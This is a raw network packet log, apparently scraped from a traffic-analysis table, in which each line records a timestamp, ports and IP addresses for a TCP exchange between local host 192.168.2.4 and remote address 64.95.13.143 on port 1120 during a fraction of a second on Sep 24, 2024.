Sep 24, 2024 17:46:12.407666922 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.408058882 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.408066034 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.408077002 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.408082962 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.408088923 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.408099890 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.408107042 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.408113003 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.408123970 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.408129930 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.408137083 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.408143997 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.408153057 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.408160925 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.408169985 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.408184052 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.408190012 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.408204079 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.408221006 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.408241034 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.408252001 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.409672976 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.409681082 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.409687042 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.409693003 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.409699917 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.409713030 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.409718990 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.409724951 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.409729958 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.409739971 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.409746885 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.409759045 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.409765959 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.409775019 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.409785032 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.409786940 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.409796953 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.409818888 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.409837961 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.410002947 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.410007954 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.410021067 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.410027981 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.410042048 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.410048962 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.410068035 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.410088062 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.410095930 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.410105944 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.410110950 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.410120010 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.410125971 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.410141945 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.410144091 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.410154104 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.410166025 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.410190105 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.410423994 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.410430908 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.410473108 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.411051989 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.411058903 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.411070108 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.411096096 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.411101103 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.411109924 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.411119938 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.411128998 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.411140919 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.411165953 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.411192894 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.466929913 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.470763922 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.470774889 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.470788956 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.470850945 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.470892906 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.470900059 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.470911980 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.470920086 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.470947027 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.494668961 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.494685888 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.494700909 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.494745970 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.494752884 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.494765043 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.494774103 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.494788885 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.494827032 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.497591019 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.497602940 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.497617960 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.497659922 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.497689962 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.497698069 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.497709990 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.497718096 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.497735977 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.497756958 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.497936010 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.497983932 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.497991085 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.498001099 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.498008013 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.498019934 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.498037100 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.498044968 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.498373985 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.498380899 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.498389006 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.498395920 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.498402119 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.498406887 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.498413086 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.498418093 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.498425007 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.498436928 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.498466015 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.498495102 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.498893976 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.498902082 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.498914957 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.498922110 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.498938084 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.498946905 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.498953104 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.498960972 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.498982906 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.499273062 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.499279976 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.499286890 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.499293089 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.499300003 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.499315023 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.499351978 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.499496937 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.499505043 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.499511957 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.499519110 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.499525070 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.499531984 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.499542952 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.499551058 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.499560118 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.499568939 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.499578953 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.499588013 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.499598026 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.499608994 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.499634981 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.500272036 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.500279903 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.500287056 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.500299931 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.500307083 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.500313044 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.500320911 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.500339031 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.500344038 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.500353098 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.500371933 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.500381947 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.500386000 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.500395060 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.500402927 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.500407934 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.500417948 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.500428915 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.500447035 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.500449896 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.500459909 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.500471115 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.500480890 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.500488043 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.500504017 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.500519037 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.501156092 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.501163960 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.501177073 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.501183033 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.501189947 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.501204014 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.501215935 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.501218081 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.501230001 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.501236916 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.501249075 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.501254082 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.501265049 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.501276016 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.501283884 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.501293898 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.501317978 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.501363993 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.501926899 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.501935959 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.501948118 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.501955986 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.501961946 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.501975060 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.501982927 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.501992941 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.502002001 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.502015114 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.502022028 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.502028942 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.502038002 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.502048016 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.502057076 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.502068043 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.502103090 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.502599955 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.502608061 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.502650023 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.502964973 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.502974987 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.502983093 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.503016949 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.503041983 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.503050089 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.503062963 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.503071070 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.503088951 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.503885031 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.503932953 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.503940105 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.503973007 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.503998995 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.504029989 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.504038095 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.504080057 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.504144907 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.504151106 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.504189968 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.564888954 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.564914942 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.564938068 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.564976931 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.565037966 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.565057993 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.565072060 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.565084934 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.565099001 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.565144062 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.587667942 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.587676048 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.587682962 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.587723017 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.587753057 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.587920904 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.587934017 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.587945938 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.587960005 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.587969065 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.587997913 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.592222929 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.592281103 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.592328072 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.592358112 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.592371941 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.592386007 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.592398882 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.592413902 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.592442036 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.592732906 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.593090057 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.593112946 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.593127012 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.593135118 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.593168020 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.593242884 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.593255997 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.593269110 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.593282938 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.593293905 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.593318939 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.593533993 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.593657970 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.593671083 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.593684912 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.593694925 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.593705893 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.593723059 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.593734980 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.593749046 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.593760967 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.593780994 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.593787909 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.593807936 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.594136953 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.594151020 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.594178915 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.594214916 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.594228029 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.594240904 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.594249964 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.594261885 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.594276905 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.594281912 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.594297886 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.594321966 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.594722986 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.594736099 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.594748974 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.594760895 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.594772100 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.594784975 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.594791889 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.594800949 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.594820023 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.594831944 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.594845057 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.594857931 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.594870090 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.594881058 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.594897032 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.594903946 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.594916105 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.594929934 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.594940901 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.594975948 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.595487118 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.595499992 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.595513105 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.595526934 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.595536947 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.595549107 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.595560074 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.595568895 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.595582962 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.595594883 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.595614910 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.595626116 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.595642090 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.595653057 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.595674992 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.595686913 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.595699072 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.595710039 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.595721960 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.595731020 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.595743895 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.595758915 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.595777988 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.595789909 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.595799923 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.595810890 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.595824003 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.595829964 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.595838070 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.595897913 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.596473932 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.596493006 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.596503973 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.596514940 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.596527100 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.596538067 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.596546888 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.596559048 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.596571922 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.596585035 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.596594095 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.596610069 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.596621990 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.596638918 CEST11204973064.95.13.143192.168.2.4
